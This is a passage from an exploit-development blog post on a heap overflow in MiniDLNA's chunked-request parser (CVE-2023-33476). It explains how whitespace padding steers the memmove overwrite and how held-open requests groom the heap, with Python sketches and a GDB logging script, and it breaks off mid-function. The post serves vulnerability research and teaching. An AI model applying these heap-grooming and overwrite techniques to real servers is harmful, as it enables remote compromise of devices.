MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going
over the various challenges that had to be overcome and how everything was put together to achieve
remote code execution and pop a shell. Check out <a href="https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca.html">part 1</a> for the root cause analysis of this bug.</p>

<p>Before diving into the details of the vulnerability and the exploit, it’s worth taking a moment to
go over the basics of how chunked requests work and the fundamentals of the bug.</p>

<p><strong><em>Disclaimer: this is a pretty long post and there may be a few details I might have missed, but I’ve
tried to include as much as possible to help it all make sense and help others who are trying to
learn. If you find any glaring issues/mistakes please reach out to let me know and I’ll add any
corrections needed.</em></strong></p>

<p>If you just care about the code, you can find it <a href="https://github.com/mellow-hype/cve-2023-33476">here</a>.</p>

<h3 id="review-of-http-chunked-encoding">review of http chunked encoding</h3>

<p>An HTTP request will set the <code class="language-plaintext highlighter-rouge">Transfer-Encoding</code> HTTP header to <code class="language-plaintext highlighter-rouge">chunked</code> to indicate to the
server that the body of the request should be processed in chunks. The chunks follow a common
encoding scheme: a header containing the size of the chunk (in hex) followed by the actual
chunk data. As this is HTTP, the character sequence <code class="language-plaintext highlighter-rouge">\r\n</code> serves as delimiter bytes between chunk
size headers and chunk data. The last chunk (terminator chunk) is always a zero-length chunk.</p>

<p>A typical request using chunked encoding will look something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /somepath HTTP/1.1
Transfer-Encoding: chunked

4
AAAA
10
BBBBBBBBBBBBBBBB
0

</code></pre></div></div>

<p>The request above contains two chunks: one 4-byte chunk and one 16-byte chunk (chunk sizes are parsed
as hex), followed by the zero-length terminator chunk. The server will parse the chunk sizes and
use this to construct a single blob of data composed of the concatenated chunk data, minus the size
metadata.</p>
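<p>For reference, here’s a minimal Python sketch of how a client might produce a body like the one above. The <code class="language-plaintext highlighter-rouge">encode_chunked()</code> helper is a name I’m making up for this example; it isn’t taken from the exploit code.</p>

```python
def encode_chunked(chunks):
    """Encode an iterable of byte strings as an HTTP chunked request body."""
    body = b""
    for data in chunks:
        if not data:
            continue  # a zero-length chunk would terminate the body early
        # size in hex, CRLF, the chunk data, CRLF
        body += b"%x\r\n" % len(data) + data + b"\r\n"
    # zero-length terminator chunk followed by the final CRLF
    return body + b"0\r\n\r\n"


body = encode_chunked([b"AAAA", b"B" * 16])
print(body)
```

<p>Note that the 16-byte chunk is announced as <code class="language-plaintext highlighter-rouge">10</code> because the size field is hex.</p>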

<h3 id="summary-of-the-bug-and-initial-primitive">summary of the bug and initial primitive</h3>

<p>Let’s review the fundamentals of the bug and the primitives provided. The relevant snippet of code
that triggers the memory corruption as a result of the bug is shown below.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="o">*</span><span class="n">chunkstart</span><span class="p">,</span> <span class="o">*</span><span class="n">chunk</span><span class="p">,</span> <span class="o">*</span><span class="n">endptr</span><span class="p">,</span> <span class="o">*</span><span class="n">endbuf</span><span class="p">;</span>

    <span class="c1">// `chunk`, `endbuf`, and `chunkstart` all begin pointing to the start of the request body</span>
    <span class="n">chunk</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">=</span> <span class="n">chunkstart</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>

    <span class="k">while</span> <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chunk</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">chunk</span><span class="p">)</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">Send400</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
            <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">endptr</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">;</span>

        <span class="c1">// this call to memmove will use the chunk size parsed by strtol() above</span>
        <span class="n">memmove</span><span class="p">(</span><span class="n">endbuf</span><span class="p">,</span> <span class="n">endptr</span><span class="p">,</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">);</span>

        <span class="n">endbuf</span> <span class="o">+=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">endptr</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>To recap the important details:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">strtol()</code> is used to parse the HTTP chunk size from the body of the request (which we fully
control). The value returned by <code class="language-plaintext highlighter-rouge">strtol()</code> is saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code></li>
  <li><code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is used as the size argument in a call to <code class="language-plaintext highlighter-rouge">memmove()</code> without bounds-checking</li>
  <li>The <code class="language-plaintext highlighter-rouge">dest</code> and <code class="language-plaintext highlighter-rouge">src</code> arguments passed to <code class="language-plaintext highlighter-rouge">memmove()</code> are both offsets into the request buffer;
in theory, they should point to the first digit of the chunk size and the first byte of the actual
chunk data that follows the chunk size, respectively.</li>
  <li>the request buffer containing our data is allocated on the heap</li>
</ul>

<p>Due to the missing bounds-check in the code above (and the broken validation logic that is the
root cause of the issue), the bug provides an OOB read/write primitive of arbitrary size. At this
point, I still had almost no control over what gets written and where it’s written to. Since the
corruption occurs on data allocated on the heap, this introduced the option to either attack the
application data directly or target the heap metadata to derive more powerful primitives.</p>
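<p>To see the primitive in action without a debugger, the loop can be modeled roughly in Python. This is a sketch under a few assumptions: the heap is a single <code class="language-plaintext highlighter-rouge">bytearray</code> holding the request followed by some made-up neighboring data, <code class="language-plaintext highlighter-rouge">strtol16()</code> is my own approximation of <code class="language-plaintext highlighter-rouge">strtol(..., 16)</code>, the search for <code class="language-plaintext highlighter-rouge">\r\n</code> ignores NUL termination, and the copy is clamped to the simulated heap so the script doesn’t fall over.</p>

```python
WHITESPACE = b" \t\n\v\f\r"
HEXDIGITS = b"0123456789abcdefABCDEF"


def strtol16(buf, pos):
    """Approximate strtol(buf + pos, &endptr, 16); returns (value, endptr)."""
    i = pos
    while i < len(buf) and buf[i] in WHITESPACE:
        i += 1                      # leading whitespace is skipped
    sign = 1
    if i < len(buf) and buf[i] in b"+-":
        sign = -1 if buf[i] == ord("-") else 1
        i += 1
    if buf[i:i + 2] in (b"0x", b"0X") and i + 2 < len(buf) and buf[i + 2] in HEXDIGITS:
        i += 2                      # optional 0x prefix
    start = i
    while i < len(buf) and buf[i] in HEXDIGITS:
        i += 1
    if i == start:
        return 0, pos               # nothing parsed: endptr == nptr
    return sign * int(buf[start:i], 16), i


def dechunk(heap, body_off):
    """Model of the vulnerable loop; returns (endbuf, endptr, chunklen) per copy."""
    chunk = endbuf = body_off
    moves = []
    while True:
        chunklen, endptr = strtol16(heap, chunk)
        if not (chunklen > 0 and endptr != chunk):
            break
        endptr = heap.find(b"\r\n", endptr)
        if endptr < 0:
            raise ValueError("Send400")
        endptr += 2
        n = min(chunklen, len(heap) - endptr)           # clamp: simulation only
        heap[endbuf:endbuf + n] = heap[endptr:endptr + n]  # the unchecked memmove
        moves.append((endbuf, endptr, chunklen))
        endbuf += chunklen
        chunk = endptr + chunklen
    return moves


request = b"ff\r\nAAAA"               # claims 255 bytes, supplies 4
neighbor = b"NEIGHBOR-CHUNK-DATA"     # pretend adjacent heap contents
heap = bytearray(request + neighbor)
moves = dechunk(heap, 0)
print(moves, bytes(heap))
```

<p>With an oversized chunk length, the copy reads past the end of the request and drags the neighboring bytes down into the request buffer, which is the OOB read/write described above.</p>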

<h2 id="understanding-the-corruption-mechanism">Understanding the Corruption Mechanism</h2>

<p><em>NOTE: all references to “chunks” in the sections below are referring to HTTP chunks, not heap chunks.</em></p>

<h3 id="effects-of-memmove">effects of <code class="language-plaintext highlighter-rouge">memmove()</code></h3>

<p>We’ll start with the detail that had the most impact on developing the exploit: the use of
<code class="language-plaintext highlighter-rouge">memmove()</code> to concatenate the end of one HTTP chunk to the next. Each iteration through the while
loop in the code snippet above is meant to process a single HTTP chunk from the body of the request;
assuming multiple chunks are present (which is always the case for valid requests) the code needs to
concatenate the beginning of the chunk it is processing to the tail end of the chunks that have
already been processed and remove the chunk size metadata between them. The application does this
in-line within the same buffer instead of creating a new allocation to hold the final blob of data;
it selects the range of bytes pertaining to the current chunk being processed based on the chunk size
it finds in the request and will then ‘left-shift’ those bytes <code class="language-plaintext highlighter-rouge">x</code> bytes lower in memory, where <code class="language-plaintext highlighter-rouge">x</code>
is the total length of the chunk size field (i.e. <code class="language-plaintext highlighter-rouge">strlen(chunk_size_line)</code>).</p>

<p>In practical terms, this introduces the following conditions and constraints:</p>

<ul>
  <li>As we can only control the size and not the location of the r/w, we are only able to r/w
higher into memory relative to the location of the chunk in the buffer allocated for the request</li>
  <li>The number of bytes the data will be left-shifted by is determined by the distance between the
<code class="language-plaintext highlighter-rouge">dest</code> and <code class="language-plaintext highlighter-rouge">src</code> args passed to <code class="language-plaintext highlighter-rouge">memmove()</code> (<code class="language-plaintext highlighter-rouge">endbuf</code> and <code class="language-plaintext highlighter-rouge">endptr</code> respectively in the snippet of
the vulnerable code above)</li>
</ul>

<h3 id="visualizing-the-operation">visualizing the operation</h3>

<p>This particular aspect of the bug and the impact it has on exploitation isn’t very intuitive (at
least not to me) so it may be useful to try to visualize it. I created the graphic below using Google
Sheets (lol) while working on the exploit to help me grok the details so I’m hoping it’s useful here.</p>

<p>The before and after rows below represent a contiguous chunk of memory containing the contents of an
HTTP request before and after the <code class="language-plaintext highlighter-rouge">memmove()</code> operation using the chunk size at the beginning of
the request data (23). We can imagine that the row of bytes is a ribbon on a fixed track; by “pulling”
on the left side of the ribbon starting at <code class="language-plaintext highlighter-rouge">read_src</code> , we can shift the bytes to the left toward
us (we’re fixed at <code class="language-plaintext highlighter-rouge">write_dest</code>). There isn’t a limit to how much data to the right of <code class="language-plaintext highlighter-rouge">read_src</code>
we can shift left, but we can only shift by (<code class="language-plaintext highlighter-rouge">read_src - write_dest</code>) slots. The grid slots (i.e.
addresses) are fixed, so if we want some payload to end up at a specific target address we need to
be able to shift the bytes of that payload left by at least (<code class="language-plaintext highlighter-rouge">target_addr - payload_addr</code>).</p>

<p>To break it down:</p>

<ul>
  <li>The cells with the red border show the bytes that would be selected by a chunk size of 23 (as
seen at the beginning of the row)</li>
  <li>The location where <code class="language-plaintext highlighter-rouge">memmove()</code> will write the bytes to is highlighted in green (<code class="language-plaintext highlighter-rouge">endbuf</code> ptr
passed as first arg)</li>
  <li>The location where <code class="language-plaintext highlighter-rouge">memmove()</code> will start reading from is highlighted in purple (<code class="language-plaintext highlighter-rouge">endptr</code> ptr
passed as the second arg)</li>
</ul>

<p><img src="/assets/images/chonked-images/memmove-viz-1.png" alt="memmove-viz-1.png" /></p>

<p>Extrapolating from the examples above, we can see that changing the chunk size alone will have
virtually 0 impact on <em>where</em> the data is written relative to our target — larger sizes will reach
further into memory but will result in those bytes being shifted by the same distance, which means
for a given target at address <code class="language-plaintext highlighter-rouge">x</code> and payload data at <code class="language-plaintext highlighter-rouge">x+20</code>, selecting bytes up to x+20 or x+100
will result in the same bytes being written to <code class="language-plaintext highlighter-rouge">x</code> after the call to <code class="language-plaintext highlighter-rouge">memmove()</code>.</p>
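<p>This is easy to check with a quick Python sketch. The buffer size, offsets, and the <code class="language-plaintext highlighter-rouge">byte_at_target()</code> helper are arbitrary choices for the demonstration; each byte of the buffer holds its own index so it’s obvious where a value came from.</p>

```python
def memmove(mem, dest, src, n):
    """Overlap-safe copy inside one bytearray, like C's memmove()."""
    mem[dest:dest + n] = mem[src:src + n]


def byte_at_target(n, target=16, dest=0, src=4, size=128):
    """Run one copy of n bytes and report which byte ends up at `target`."""
    mem = bytearray(range(size))   # mem[i] == i before the copy
    memmove(mem, dest, src, n)
    return mem[target]


small = byte_at_target(n=24)
large = byte_at_target(n=104)
print(small, large)
```

<p>Both copies leave the byte that started at index 20 sitting at index 16: the copy length changes how far the read reaches, not how far the data moves.</p>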

<h3 id="controlling-the-shift-distance">controlling the shift distance</h3>

<p>As mentioned in the previous section, the distance the selected byte-range is shifted by is
determined by the number of bytes between the pointer where the bytes will be written (<code class="language-plaintext highlighter-rouge">endbuf</code>)
and the pointer where data will be read from (<code class="language-plaintext highlighter-rouge">endptr</code>). Based on the parsing logic, this ends up
being the number of bytes between the first byte of the chunk size in the request body and the
location where the first byte of actual chunk data is expected to be. In the code, this is done by
passing a pointer <code class="language-plaintext highlighter-rouge">&amp;endptr</code> as the second arg to <code class="language-plaintext highlighter-rouge">strtol()</code> when parsing the chunk size value from
the request to have <code class="language-plaintext highlighter-rouge">strtol()</code> store the location of the first non-parsable value it encounters to this pointer.
In a normal request, this would be the <code class="language-plaintext highlighter-rouge">\r</code> that comes immediately after the chunk size. The code
checks for the presence of <code class="language-plaintext highlighter-rouge">\r\n</code> starting at the value saved to this pointer to confirm this sequence
is in fact present and if found increments it by 2 to move it past those characters. The pointer
would then presumably point to the start of the actual chunk data.</p>

<p>The relevant code is shown again here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">while</span> <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chunk</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">chunk</span><span class="p">)</span> <span class="p">)</span>
  <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span> <span class="p">...</span> <span class="p">}</span>
        <span class="n">endptr</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">;</span>

        <span class="n">memmove</span><span class="p">(</span><span class="n">endbuf</span><span class="p">,</span> <span class="n">endptr</span><span class="p">,</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>

<p>This means that in order to gain control over that distance, it’s necessary to introduce additional
bytes between the two pointers without causing <code class="language-plaintext highlighter-rouge">strtol()</code> to stop parsing prematurely. Taking a
look at the manpage for <code class="language-plaintext highlighter-rouge">strtol()</code>, the following line caught my attention:</p>

<blockquote>
  <p>The string may begin with an arbitrary amount of white space (as determined by isspace(3)). […] The remainder of the string is converted to a long value in the obvious manner, […]</p>
</blockquote>

<p>By prepending the chunk size value with whitespace, it’s possible to introduce a nearly arbitrary
number of bytes in order to affect the distance between <code class="language-plaintext highlighter-rouge">endbuf</code> and <code class="language-plaintext highlighter-rouge">endptr</code> when <code class="language-plaintext highlighter-rouge">memmove()</code> is
called. Alternatively, prepending leading <code class="language-plaintext highlighter-rouge">0</code>s to the chunk size achieves the same result.</p>
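<p>As a rough sketch of how that padding could be computed for the first chunk in a request: the shift distance is just the total length of the chunk size line, so we pad it out to whatever distance we need. The <code class="language-plaintext highlighter-rouge">chunk_header()</code> helper below is hypothetical (not lifted from the exploit) and assumes the <code class="language-plaintext highlighter-rouge">\r\n</code> comes immediately after the size digits.</p>

```python
def chunk_header(size, shift):
    """Build a chunk-size line whose total length equals the desired shift."""
    digits = b"%x" % size
    pad = shift - len(digits) - len(b"\r\n")
    if pad < 0:
        raise ValueError("shift is smaller than the bare size line")
    # leading spaces are skipped by strtol() but still count toward the distance
    return b" " * pad + digits + b"\r\n"


plain = chunk_header(0x23, 4)
padded = chunk_header(0x23, 11)
print(plain, padded)
```

<p>Swapping the spaces for <code class="language-plaintext highlighter-rouge">0</code> characters should produce a line of the same length that parses to the same value.</p>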

<h4 id="example">example</h4>

<p>This example shows a request where no leading whitespace has been added. At the first round of processing:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">endbuf</code> is at index/address <strong>489</strong></li>
  <li><code class="language-plaintext highlighter-rouge">endptr</code> is at index/address <strong>493</strong></li>
  <li>Chunk size is 23, so 23 bytes will be shifted</li>
  <li>(<code class="language-plaintext highlighter-rouge">489 - 493 = -4</code>), so each byte in the range of bytes to be shifted will shift <strong>-4 bytes</strong> down.</li>
  <li>We want to overwrite 4 bytes starting at index <strong>501</strong> (cells highlighted in red)</li>
  <li>The payload data we want to use for the overwrite starts at index <strong>512</strong> (cells highlighted in yellow)</li>
  <li>Distance between overwrite target and overwrite data source is <strong>-11 bytes</strong></li>
  <li>The corruption does <strong>NOT</strong> successfully shift our overwrite data to the desired location</li>
</ul>

<p><img src="/assets/images/chonked-images/shift-viz-1.png" alt="shift-viz-1.png" /></p>

<p>With the introduction of whitespace prepended to the chunk size at the start of the request body:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">endbuf</code> is now at index <strong>482</strong></li>
  <li><code class="language-plaintext highlighter-rouge">endptr</code> is still at index <strong>493</strong></li>
  <li>(<code class="language-plaintext highlighter-rouge">482 - 493 = -11</code>), so each byte in the range of bytes to be shifted will shift <strong>-11 bytes</strong> down.</li>
  <li>We want to overwrite 4 bytes starting at index <strong>501</strong></li>
  <li>The data we want to use for the overwrite starts at index <strong>512</strong></li>
  <li>Distance between overwrite target and overwrite data source is still <strong>-11 bytes</strong></li>
</ul>

<p><img src="/assets/images/chonked-images/shift-viz-2.png" alt="shift-viz-2.png" /></p>

<p>Based on this, I concluded that it would be necessary to insert enough whitespace before the chunk
size to make <code class="language-plaintext highlighter-rouge">endbuf - endptr</code> == <code class="language-plaintext highlighter-rouge">overwrite_target - payload_data</code>.</p>
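<p>Using the indices from the example above, the arithmetic can be sketched as follows. This is
only a model: <code class="language-plaintext highlighter-rouge">padding_needed()</code> and <code class="language-plaintext highlighter-rouge">simulate_shift()</code> are hypothetical helpers, a
<code class="language-plaintext highlighter-rouge">bytearray</code> stands in for the request buffer, and it assumes (as in the figures) that
<code class="language-plaintext highlighter-rouge">endptr</code> stays put while <code class="language-plaintext highlighter-rouge">endbuf</code> moves back by the number of padding bytes.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def padding_needed(endbuf, endptr, target, payload):
    """Extra bytes to insert before the chunk size so that
    endbuf - endptr == target - payload."""
    return (payload - target) - (endptr - endbuf)


def simulate_shift(buf, endbuf, endptr, length):
    """Model memmove(endbuf, endptr, length) on a bytearray."""
    buf[endbuf:endbuf + length] = buf[endptr:endptr + length]


pad = padding_needed(endbuf=489, endptr=493, target=501, payload=512)

buf = bytearray(b"." * 600)
buf[512:516] = b"PWND"                    # payload data at index 512
simulate_shift(buf, 489 - pad, 493, 23)   # chunk size of 23, as in the example
print(pad, bytes(buf[501:505]))           # 7 b'PWND'
</code></pre></div></div>

<p>With 7 bytes of padding the shift becomes -11 and the four payload bytes land on the overwrite
target at index 501.</p>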

<h3 id="heap-based-corruption">heap-based corruption</h3>

<p>The corruption occurs on heap-allocated data, so it’s possible to corrupt the metadata of
neighboring heap chunks. Based on the conditions described so far, it’s actually <em>impossible</em> to
avoid corrupting at least the chunk that is immediately next to ours. This is because for a minimal
request containing no data in the chunk fields (such as the request provided as an example at the
beginning of this post) the <code class="language-plaintext highlighter-rouge">memmove()</code> operation is going to be performed on data near the end of
the allocated buffer, overflowing into the next chunk almost immediately. While this introduces
additional attack surface and exploitation options, it also adds some limitations, namely the need
to bypass Glibc security and sanity checks so as to avoid <code class="language-plaintext highlighter-rouge">abort()</code>ing before the exploit finishes
or triggering some other crash.</p>

<h2 id="heap-feng-shui">Heap Feng Shui</h2>

<p><em>NOTE: references to “chunks” below are referring to heap chunks now, not HTTP chunks.</em></p>

<p>Given the heap-allocated buffers, we’ll focus on exploiting the heap directly (i.e. targeting
heap chunk metadata). Heap-based exploits typically benefit from (or outright require) achieving
some level of control over the layout of the heap in order to get target objects and payload data
allocated at predictable locations. Based on the conditions described above, this would be absolutely
necessary for a successful exploit in this case. Specifically, it would be necessary in order to
meet these requirements:</p>

<ol>
  <li>The overwrite target must be located higher in memory <em>relative to where
the request buffer used to trigger the corruption is located</em></li>
  <li>The payload data used to overwrite the target address must be located higher in memory
<em>relative to the target address</em></li>
</ol>

<p>Based on these requirements, the ideal memory layout would look something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x2000
---
	.....................
	...request_buffer.... &lt;-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. &lt;-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... &lt;-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600
</code></pre></div></div>

<p>For this theoretical layout, we would then provide a chunk size large enough to traverse the
<code class="language-plaintext highlighter-rouge">overwrite_target</code> and reach the last byte of the <code class="language-plaintext highlighter-rouge">payload_data</code>.</p>

<p>In practice, to achieve the layout above it’s necessary to:</p>

<ul>
  <li>Have controlled data allocated to the heap</li>
  <li>Prevent the allocations from being <code class="language-plaintext highlighter-rouge">free()</code>’d prematurely</li>
  <li>Force allocations to happen sequentially or in a way that can be reliably predicted</li>
</ul>

<h3 id="controlling-allocations">controlling allocations</h3>

<p>Unsurprisingly, the most straightforward way to force the application to make heap allocations with
controlled data is by sending HTTP requests, so this can be used as an interface/proxy for <code class="language-plaintext highlighter-rouge">malloc()</code>.
One important detail about this is that the request buffer allocations are done using <code class="language-plaintext highlighter-rouge">realloc()</code>
rather than <code class="language-plaintext highlighter-rouge">malloc()</code>: requests that exceed 2048 bytes will result in the existing allocation
being reallocated, which can affect the heap layout and result in heap chunks being freed
unintentionally. We can avoid this issue entirely by keeping all requests below this size.</p>

<h3 id="holding-request-allocations">holding request allocations</h3>

<p>The next requirement is almost more important than the first — the allocations containing our
controlled data must remain allocated across multiple requests in order to successfully get the
desired memory layout. This took a little bit of fiddling around but I eventually found an easy way
to do this.</p>

<p>The code that handles the initial reading of the request data from the socket is shown below. After
copying the data from the static buffer to the dynamically allocated buffer at <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>, it
searches for the presence of the sequence <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> using <code class="language-plaintext highlighter-rouge">strstr()</code> to determine whether the
entire contents of the HTTP headers have been received (the first occurrence of that sequence is
expected to be the terminator for the headers).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>        <span class="n">memcpy</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
        <span class="c1">// update req_buflen</span>
        <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">+=</span> <span class="n">n</span><span class="p">;</span>
        <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">[</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>

        <span class="cm">/* search for the string "\r\n\r\n" */</span>
        <span class="c1">// this is the mechanism used to determine where the end of the http</span>
        <span class="c1">// headers are since that should be the first occurrence of this string sequence</span>
        <span class="c1">// for a normal http request.</span>
        <span class="n">endheaders</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n\r\n</span><span class="s">"</span><span class="p">);</span>

        <span class="k">if</span><span class="p">(</span><span class="n">endheaders</span><span class="p">)</span>
        <span class="p">{</span>
          <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span> <span class="o">=</span> <span class="n">endheaders</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
          <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>
          <span class="n">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
        <span class="p">}</span>
</code></pre></div></div>

<p>If this sequence is <strong>not</strong> found, the application skips the block where
<code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code> is called above and waits for the client to send more data to complete
the headers. The buffer at <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>, containing up to the first 2048 bytes of data
sent, then stays allocated until more data arrives on the socket or the connection is dropped by
the client. By introducing a null byte anywhere before the first <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> terminator in the
request data sent, it’s possible to force <code class="language-plaintext highlighter-rouge">strstr()</code> to stop early and never find the terminator.
Alternatively, leaving out the terminator sequence entirely also results in the application
assuming the client has not yet sent all headers and holding the allocation. We can then
<code class="language-plaintext highlighter-rouge">free()</code> any allocation made this way by closing the socket used to initiate it.</p>
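<p>A minimal sketch of this hold-and-release trick, using plain Python sockets, might look like the
following. The names <code class="language-plaintext highlighter-rouge">held_request()</code> and <code class="language-plaintext highlighter-rouge">hold_allocation()</code> are made up for
illustration, and the size limit simply mirrors the 2048-byte threshold mentioned earlier.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket

MAX_HELD = 2048  # stay below the size at which req_buf gets realloc()'d


def held_request(size, data=b"", filler=b"A"):
    """Build exactly `size` bytes of request data with no header terminator.

    Without the CRLF CRLF sequence the server keeps waiting for more
    headers, so the buffer holding this data stays allocated.
    """
    if size not in range(1, MAX_HELD):
        raise ValueError("size must be between 1 and 2047")
    if b"\r\n\r\n" in data:
        raise ValueError("data must not contain the header terminator")
    return data[:size].ljust(size, filler)


def hold_allocation(host, port, request):
    """Send `request` and return the still-open socket.

    Closing the returned socket is what releases the allocation.
    """
    sock = socket.create_connection((host, port))
    sock.sendall(request)
    return sock


request = held_request(0x58, b"GET / HTTP/1.1\r\n")
print(len(request), b"\r\n\r\n" in request)
</code></pre></div></div>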

<h3 id="getting-sequential-allocations">getting sequential allocations</h3>

<p>With the two previous steps figured out, it was then possible to start influencing the heap layout
and work toward getting allocations made in a predictable way, in order to eventually set things up
for the exploit. The first step was to identify
where heap allocations happen along the execution path for request processing, their sizes, and
whether they contained any data that may be interesting to target. After a bit of code review I
determined that, apart from the request buffer allocation (saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>), the only other
relevant allocation that happens for each request is for a <code class="language-plaintext highlighter-rouge">upnphttp</code> structure, which stores the
state, data, and metadata for the request being processed (saved to <code class="language-plaintext highlighter-rouge">h</code>). The pointer to the
request buffer itself is stored inside the <code class="language-plaintext highlighter-rouge">upnphttp</code> structure.</p>

<p>I created the following GDB script to log every time either a request allocation or <code class="language-plaintext highlighter-rouge">upnphttp</code>
struct allocation occurred and the addresses for the allocations.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set verbose off
gef config context.enable False

break upnphttp.c:1140
commands 1
    echo \n\n
    printf "============== Allocation for req_buf is at %p\n",h-&gt;req_buf
    echo \n\n
    printf "==============================================\n"
    continue
end

break upnphttp.c:118
commands 2
    echo \n\n
    printf "============== NEW upnphttp struct is at = %p\n",ret
    echo \n\n
    printf "==============================================\n"
    continue
end

run -R -f testing_tmp.conf -d
</code></pre></div></div>

<p>I wrote a Python script using raw sockets to start performing allocations for both the
<code class="language-plaintext highlighter-rouge">upnphttp</code> structures and the request buffers and observing the addresses where the allocations
occurred, using the method described in the previous section to keep the allocations held in memory
across multiple requests. This took a bit of fiddling and playing with the order that connections
were initiated in and when request buffers were allocated but I eventually found that after about
6-7 request buffer allocations (after having initiated the connections ahead of time) the buffers
began getting allocated sequentially in memory.</p>
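<p>To make “sequentially” concrete, here is a small sketch of how the GDB log could be checked
automatically. It assumes the log lines look like the <code class="language-plaintext highlighter-rouge">printf</code> output from the script above;
the addresses in the sample log and the <code class="language-plaintext highlighter-rouge">0x60</code> chunk size are invented for the example, and
both function names are hypothetical.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import re

ADDR_RE = re.compile(r"Allocation for req_buf is at (0x[0-9a-fA-F]+)")


def req_buf_addrs(log_text):
    """Extract req_buf addresses, in order, from the GDB script's output."""
    return [int(match, 16) for match in ADDR_RE.findall(log_text)]


def sequential_tail(addrs, chunk_size):
    """Return the run at the end of `addrs` in which each address is
    exactly `chunk_size` bytes above the previous one."""
    run = addrs[-1:]
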